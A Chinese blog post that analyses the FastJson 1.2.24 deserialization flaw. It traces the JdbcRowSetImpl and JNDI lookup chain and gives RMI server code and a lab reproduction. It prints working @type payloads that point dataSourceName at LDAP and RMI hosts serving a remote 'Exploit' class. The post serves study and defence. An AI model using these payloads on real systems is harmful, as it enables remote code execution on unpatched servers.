FastJson 反序列化漏洞原理分析

最新推荐文章于 2024-05-20 23:13:23 发布
最新推荐文章于 2024-05-20 23:13:23 发布
阅读量8.7k 收藏 35
点赞数 3
分类专栏: 漏洞复现 Web安全 文章标签: spring java fastjson 反序列化 autotype
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/119297798
版权

FastJson 反序列化漏洞原理分析

FastJson 简介

fastjson框架下载:https://github/alibaba/fastjson

fastjson-jndi 下载:https://github.com/earayu/fastjson_jndi_poc

fastjson 是阿里巴巴开发的 java语言编写的高性能 JSON 库,用于将数据在 Json 和 Java Object之间相互转换。它没有用java的序列化机制,而是自定义了一套序列化机制。

提供两个主要接口:

JSON.toJSONString 和 JSON.parseObject/JSON.parse 分别实现序列化和反序列化

漏洞原理

fastjson就是为了知道传入的值是水果里的苹果类型还是水果里的苹果手机类型。加了autotype机制导致的。因为他为了知道是什么详细类型,每次都需要读取下@type导致的。

Fastjson反序列化的Gadget需要无参默认构造方法或者注解指定构造方法并添加相应参数。使用Feature.SupportNonPublicField才能打开非公有属性的反序列化处理,@type可以指定反序列化任意类调用其set,get,is方法,并且由于反序列化的特性,我们可以通过目标类的set方法自由的设置类的属性值。

攻击者准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE。

FastJson 序列化操作

序列化

Student student = new Student();
student.setName("jack");
String jsonString = JSON.toJSONString(student, SerializerFeature.WriteClassName);   
	//漏洞的关键点在@type
String jsonString2 = JSON.toJSONString(student);
System.out.println(jsonString);
System.out.println(jsonString2);

请添加图片描述

反序列化

    //反序列化
System.out.println("反序列化");
    //String json_ser = "{\"@type\":\"com.company.Student\",\"name\":\"jack\"}";      		//payload 写在恶意类Student中。但是类在服务端,如何去创建,如何写payload
String json_ser2 = "{\"name\":\"jack\"}";
Student stu = JSON.parseObject(json_ser2,Student.class,Feature.SupportNonPublicField);
    //Feature.SupportNonPublicField 获取类中的私有变量
Student stu2 = (Student) JSON.parseObject(json_ser2,Object.class,Feature.SupportNonPublicField);
System.out.println(stu.getClass());
System.out.println(stu2.getClass().getName());

序列化 String json_ser2 = “{“name”:“jack”}” ;会报错

序列化 String json_ser = “{”@type":“com.company.Student”,“name”:“jack”}"; 不会报错

因此能够执行反序列化的根源定位在 @type

请添加图片描述
请添加图片描述

调用链分析原理

可利用的 fastjson版本:[1.2.22,1.2.24]。高版本没有此漏洞

思路:类在服务端,如何去创建,如何写payload。

 //LADP 方式
String payload1 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:1389/Exploit\"," + " \"autoCommit\":true}";
 //RMI 方式
String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + " \"autoCommit\":true}";

这就用到了JNDI。JNDI提供了 查找和访问各种命名和目录服务的通用、统一的接口。支持的服务:DNS,LDAP,RMI,CORBA等

JNDI注入发生在客户端的lookup()中,如果lookup()的参数可控即可导致被攻击

运行SomeFastjsonApp,可以直接打开电脑中的计算器

请添加图片描述

定位 com.sun.rowset.JdbcRowSetImpl 这个类(在jdk的rt.jar中的 com.sun.rowset)

然后定位 setDataSourceName 方法

请添加图片描述

在JdbcRowSetImpl 这个类 中定位autocommit

请添加图片描述

然后 按下ctrl + 鼠标左键,点击connect方法,继续定位

看到一个lookup方法,其中getDataSoureceName可控,这就是漏洞可以利用的原理

请添加图片描述

利用过程分析

RMI 的实现

  1. RMI是 Java中 专为 JAVA 环境设计的 远程方法调用机制

  2. 远程对象能在rmi服务器上注册

  3. 指向web服务器

服务端

public class RegistryService {
    public static void main(String[] args) {
        try {
            // 本地主机上的远程对象注册表Registry的实例,默认端口1099
            Registry registry = LocateRegistry.createRegistry(1099);
            // 创建一个远程对象
            HelloRegistryFacade hello = new HelloRegistryFacadeImpl();
            // 把远程对象注册到RMI注册服务器上,并命名为HelloRegistry
            registry.rebind("HelloRegistry", hello);
            System.out.println("======= 启动RMI服务成功! =======");
        } catch (RemoteException e) {
            e.printStackTrace();
        }
    }
}

客户端

public class RegistryClient {
    public static void main(String[] args) {
        try {
            Registry registry = LocateRegistry.getRegistry(1099);
            HelloRegistryFacade hello = (HelloRegistryFacade) registry.lookup("HelloRegistry");
            String response = hello.helloWorld("ZhenJin");
            System.out.println("=======> " + response + " <=======");
        } catch (NotBoundException | RemoteException e) {
            e.printStackTrace();
        }
    }
}

JNDI

JNDI是Java命令和目录接口,提供了查找各种命名和目录服务的统一的接口。

简单理解就是:java微服务中的注册中心

JNDI 借助目标服务器上的一个类jdbcRowSetImpl,让目标服务器访问远程rmi服务器(rmi://127.0.0.1:1099/Exploit),得到响应后执行相应操作

服务器端代码构造
  1. 在jndi的 JNDIServer类中构造

请添加图片描述

  1. rmi服务端 需要一个Exploit.class 放到 rmi 指向的 web服务器目录下,这个Exploit.class 是一个factory ,通过Exploit.java编译得来,在 JNDI 执行的过程中会被初始化。如下是Exploit.java的代码

请添加图片描述

  1. 服务端构造好之后,下面来看 payload
public class SomeFastjsonApp {

    public static void main(String[] argv){
        testJdbcRowSetImpl();
    }

    public static void testJdbcRowSetImpl(){
        //JDK 8u121以后版本需要设置改系统变量
        //System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        //LADP 方式
        String payload1 = "		{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:1389/Exploit\"," + " \"autoCommit\":true}";
        
        //RMI 方式
        String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + " \"autoCommit\":true}";
        JSONObject.parseObject(payload2);
    }

}

总结

1. fastjson 利用过程

fastjson中,在反序列化的时候 jdk中 的 jdbcRowSetImpl 类一定会被执行,我们给此类中的 setDataSourcesName 输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞

2. 恶意类怎么上传到服务端

通过jndi在服务端创造一个有危害的类,目标服务器收到rmi的命令之后,就会加载这个jndi生成的恶意类

3. fastjson rce的原理

jdk 中的 jdbcRowSetImpl 类中的 setAutoCommit 方法中的 lookup方法中的 getDataSourcesName 参数输入可控

参考

idea导jar包教程:https://www.pianshen.com/article/40051976554/

Buffedon
关注
  • 3
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
fastjson漏洞——举例说明漏洞以及原理分析——一看就会
可乐多点冰的博客
09-01 4875
最近公司一直说fastjson漏洞,比较很严重,要换成其他的json工具。怀着好奇的心情去看了一些文章,现在简单的记录一下。 1、漏洞分析 总体而言是一个叫做autoType的在搞事情。那么autoType是什么呢? 我们写一段简单代码演示一下: public class JSONController { public static void main(String[] args) throws ParseException { Province province = new
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6913
fastjson反序列化漏洞原理及利用
fastjson反序列化漏洞原理
最新发布
m0_73649671的博客
05-20 985
fastjson反序列化漏洞原理
fastjson到底做错了什么?为什么会被频繁爆出漏洞
热门推荐
HollisChuang's Blog
07-06 2万+
GitHub 15.8k Star 的Java工程师成神之路,不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的不来了解一下吗! GitHub 15.8k Star 的Java工程师成神之路,真的真的不来了解一下吗! fastjson大家一定都不陌生,这是阿里巴巴的开源一个JSON解析库,通常被用于将Java Bean和JSON 字符串之间进行转换。 前段时间,fastjson被爆出过多次存在漏洞,很多文章报道了这件事儿,并且给出了升级建议。 但是作为一个开发者,我更关注的
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3044
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在反序列化的时候就不需要再指定类名。
Fastjson反序列化漏洞史1
08-03
在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的更新和漏洞时间线进行了梳理。由于Fastjson并未在CVE(Candidate Vulnerabilities Enumeration)数据库中注册,因此查找历史漏洞事件...
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
2. **安全编码实践**:在开发过程中遵循安全编码原则,避免直接将不受信任的输入数据反序列化为可执行对象。 3. **安全测试**:在项目上线前进行安全测试,包括但不限于渗透测试,查找并修复潜在的安全问题。 4. **...
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
然而,Fastjson 1.2.69 版本存在一个严重的反序列化远程代码执行漏洞,这使得攻击者有可能通过精心构造的输入数据,绕过防御机制,执行任意远程代码,对服务器的安全构成重大威胁。 **漏洞原理** Fastjson 在处理 ...
FastJsonPoc.zip
07-05
4. **漏洞分析**:可能会有对漏洞原理的详细解析,包括为何这个特定的反序列化操作会引发安全问题。 5. **防护建议**:提供如何修复或防止此类漏洞的方法,例如更新到最新版本的Fastjson,或者在反序列化前进行安全...
fastjson漏洞环境
01-12
在给定的“fastjson漏洞环境”中,我们关注的是三个特定版本的 Fastjson 反序列化漏洞:1.2.67、1.2.66 和 1.2.62。 **一、Fastjson 反序列化漏洞** 1. **什么是反序列化漏洞?** 反序列化是将已序列化的数据恢复...
阿里代码漏洞FastJson,3分钟搞懂漏洞原理
hnjsjsac的博客
08-20 1349
前言前段时间FastJson被曝高危漏洞,其实之前也被报过类似的漏洞,只是项目中没有使用,所以一直也没怎么关注;这一次刚好有项目用到FastJson,打算对其做一个分析漏洞背景❝2020...
漏洞分析Fastjson1.2.80版本RCE漏洞原理
olga5abl的博客
10-24 2341
通过研究v1.2.50和v1.2.68的绕过方式,主要是在ObjectDeserializer接口的子类JavaBeanDeserializer中存在expectClass非空的checkAutoType调用,这也是绕过的关键。这就是Fastjson中引入AutoType的原因,但是也正因为这个特性,因为功能设计之初在安全方面考虑不周,给后续的Fastjson使用者带来了无尽的痛苦。但是,Fastjson在序列化及反序列化的过程中,没有使用Java自带的序列化机制,而是自定义了一套机制。
Fastjson序列化原理
qq_36996635的博客
07-25 3274
而getJson被简单当作了json属性的getter,所以在writer.write(object)中调用了getJson从而出现了递归。最后,在github的issue中也翻到了一个对应的问题,作者给出的答案就是换个名字。返回继续分析,在做了部分如注解别名之类的处理后,将分析得到的结果生成一个FieldInfo,并保存在fieldInfoMap中。排除自己的错误后,就将代码定位到了fastjson中,应该是fastjson中出了问题。在项目中使用了fastjson,然后出现了一个奇怪的bug。.....
FastJson反序列化漏洞
weixin_34392906的博客
11-13 1076
参考文献:https://kevien.github.io/2018/06/18/FastJson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E(%E7%BB%AD)/https://paper.seebug.org/636/http://www....
Fastjson反序列化漏洞分析
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
基于 fastjson反序列化漏洞的探究
叱咤少帅的博客
04-25 419
背景 目前很多公司都喜欢用 fastjson 这个依赖,当然本人在开发Java项目的时候也喜欢用,因为方便,但是如果你使用低版本的 FastJson的话是存在漏洞的,长久使用可能就被安全组的同事通过主机漏扫并能发现漏洞然后让你整改了。作为运维人员当然我们要督促 开发去修补漏洞或者升级最新版本。但是我们最好也能知道原理,并能在操作系统层能够有所察觉更好。现在我们来研究下这个漏洞干嘛的,又是如何被利用的。 ...
使用Fastjson序列化与反序列化对象
dayformyjob
01-10 1406
[java] view plain copy public class JSONobject {          private String obj;       private String color;          public String getObj() { return obj; }       public void setObj(
Fastjson反序列化
可爱的我可爱的code
11-19 1184
欢迎去我的博客查看原文:http://www.xpshuai.cn/posts/21856/ 简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。可以通过反序列化导致远程命令执行。 漏洞检测方法 DNSLog回显 下面有多个请求,分别放到请求数据包部分(可能某个不适用, 多试几个),通过构造DNS解析来判断是否是FastjsonFastjson在解析下.
weblogic和fastjson反序列化漏洞原理分析及复现
09-07
2. Fastjson反序列化漏洞原理分析及复现: Fastjson是一个常用的Java JSON库,该漏洞存在于Fastjson的版本1.2.24及之前的版本中。攻击者可以通过构造恶意的JSON数据,触发Fastjson反序列化漏洞,从而执行任意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值